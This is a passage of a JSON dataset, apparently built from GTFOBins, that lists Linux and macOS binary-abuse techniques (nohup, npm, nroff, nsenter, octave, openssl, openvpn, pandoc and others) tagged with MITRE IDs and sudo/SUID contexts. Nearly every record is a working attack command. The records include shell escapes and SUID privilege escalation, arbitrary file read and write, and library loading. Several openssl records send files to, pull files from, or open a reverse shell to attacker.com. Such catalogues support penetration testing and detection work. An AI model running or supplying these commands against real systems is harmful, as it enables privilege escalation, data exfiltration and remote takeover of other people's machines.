command.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:command:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:command:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:shell:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:shell:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -p -c '/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:shell:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:npm:shell:0:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:0:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:1:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:1:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:2:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:2:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:nroff:file-read:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nroff:file-read:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nroff:shell:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nroff:shell:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nsenter:shell:0:sudo","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nsenter/"]},{"id":"gtfo:nsenter:shell:0:suid","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh -p","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nsenter/"]},{"id":"gtfo:nsenter:shell:0:unprivileged","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nsenter/"]},{"id":"gtfo:ntpdate:file-read:0:sudo","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ntpdate/"]},{"id":"gtfo:ntpdate:file-read:0:suid","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ntpdate/"]},{"id":"gtfo:ntpdate:file-read:0:unprivileged","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ntpdate/"]},{"id":"gtfo:octave:file-read:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-read:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-read:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-write:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-write:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-write:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:shell:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:shell:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:shell:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:od:file-read:0:sudo","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/od/"]},{"id":"gtfo:od:file-read:0:suid","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/od/"]},{"id":"gtfo:od:file-read:0:unprivileged","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/od/"]},{"id":"gtfo:opencode:command:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:command:0:suid","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:command:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:inherit:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:inherit:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:openssl:download:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:download:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:download:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-read:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-read:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-read:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:1:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:1:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:1:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:library-load:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:library-load:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:library-load:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:reverse-shell:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:reverse-shell:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:reverse-shell:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:upload:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:upload:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:upload:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openvpn:file-read:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:file-read:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:file-read:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openvpn --config /path/to/input-file","description":"The file is actually parsed and the first partial wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:shell:0:sudo","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:shell:0:suid","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -p -s'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvpn:shell:0:unprivileged","toolId":"gtfo:openvpn","toolName":"openvpn","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"openvpn --dev null --script-security 2 --up '/bin/sh -s'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openvpn/"]},{"id":"gtfo:openvt:command:0:sudo","toolId":"gtfo:openvt","toolName":"openvt","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"openvt -- /path/to/command","description":"The command execution is displayed on the virtual console.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openvt/"]},{"id":"gtfo:opkg:shell:0:sudo","toolId":"gtfo:opkg","toolName":"opkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rpm opkg install x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opkg/"]},{"id":"gtfo:pandoc:file-read:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-read:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-read:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"pandoc -t plain /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-write:0:sudo","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-write:0:suid","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/pandoc/"]},{"id":"gtfo:pandoc:file-write:0:unprivileged","toolId":"gtfo:pandoc","toolName":"pandoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | pandoc -t plain -o 